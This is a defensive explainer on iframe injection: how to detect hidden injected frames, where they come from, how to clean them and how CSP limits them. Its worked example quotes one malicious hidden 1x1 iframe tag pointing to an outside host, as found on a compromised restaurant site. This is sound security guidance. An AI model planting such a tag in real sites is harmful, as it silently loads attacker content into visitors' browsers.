Malware
Iframe injection
Iframe injection is an attacker adding an `<iframe>` to your pages that loads their content, often hidden at 1 pixel or off-screen. Visitors load the frame without knowing it.
How it is measured
Search HTML and templates for `<iframe` tags you did not write. Look for `width="0"`, `height="1"`, `display:none`, or `left:-9999px`, and for `src` hosts nobody recognizes. Browser dev tools list all frames in the page tree.
Also check what produced the tag. Injection can come from the database, a modified template, a JavaScript file that creates the frame at runtime, or a hacked ad slot.
Worked example
A restaurant's site gets a warning from Safe Browsing. Viewing source on the homepage shows `<iframe src="http://menu-stats.top/in.php" width="1" height="1" style="visibility:hidden"></iframe>` just before `</body>`. It appears on every page, so the injection is in the footer template.
After removing it, the owner finds the same tag in 34 database rows of `wp_posts` and cleans them with a search-and-replace.
How it differs
Iframe injection plants a frame inside your site; clickjacking frames your site inside the attacker's page. One puts their content in your house, the other puts your content in their trap. A web skimmer is a script that steals card data and may use an iframe as a delivery method. Iframe injection is a symptom of compromise, not a vulnerability class.
Common errors
Deleting the tag from one template and missing the database copies. Checking only visible frames. Allowing any `frame-src` in a CSP. Assuming your site is clean because the browser shows no extra content. Cleaning the symptom and leaving the vulnerable plugin.
In practice
Add `frame-src` to your CSP and list only the embeds you use, such as a video host. Search files and database for `<iframe`. Once cleaned, update everything and rotate credentials, since someone wrote those tags.